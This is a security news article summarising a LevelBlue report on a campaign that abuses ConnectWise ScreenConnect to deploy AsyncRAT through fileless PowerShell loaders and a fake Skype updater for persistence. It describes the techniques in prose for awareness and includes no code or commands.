Pierluigi Paganini
September 11, 2025
LevelBlue researchers warn of a campaign abusing ConnectWise ScreenConnect to deploy AsyncRAT. Attackers use VBScript/PowerShell loaders and achieve persistence via a fake Skype updater.
ConnectWise ScreenConnect is a remote desktop and remote support software designed to enable secure, real-time access to computers and devices from anywhere. IT professionals, managed service providers (MSPs), and businesses widely utilize it to troubleshoot, maintain, and remotely manage endpoints.
The attack started with a compromised ScreenConnect client, threat actors initiated an interactive session through a malicious domain (relay.shipperzone[.]online) linked to unauthorized ScreenConnect deployments.
A VBScript triggered PowerShell commands that fetched two payloads, stored them in the public folder, and executed them directly in memory. The attackers decoded and ran .NET assemblies directly in memory instead of saving executables to disk, using a classic fileless malware trick that makes detection and defense much harder.
“The two payloads, logs.ldk and logs.ldr, were downloaded from a remote server. These files were written to the C:\Users\Public\ directory and loaded into memory using reflection. The script converted the first-stage payload (logs.ldk) into a byte array and passed the second (logs.ldr) directly to the Main() method. The script retrieves encoded data from the web, decodes it in-memory, and invokes a method in a dynamically loaded .NET assembly.” reads the report published by LevelBlue.
“This technique exemplifies fileless malware: no executable is written to disk, and all malicious logic is executed in-memory.”
Obfuscator.dll is the first in-memory stage of the AsyncRAT infection chain. It launches execution, sets up persistence via a fake “Skype Updater,” and disables defenses like AMSI and ETW. The malware includes It three core classes to handle initialization, dynamic payload loading, and anti-analysis tactics, ensuring stealth and preparing the system for the main payload.
AsyncClient.exe is the core C2 engine of the AsyncRAT attack chain. It decrypts config with AES-256, connects to C2 servers, and parses commands via a custom protocol. The malware gathers system and security details, monitors user activity with a keylogger, and exfiltrates sensitive data like browser extensions. The malware maintains persistence via scheduled tasks using the CreateLoginTask() function seen in Obfuscator.dll or redundantly recreated from AsyncClient.
“Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution.” concludes the report. “This approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, AsyncRAT)
Breaking News / September 11, 2025
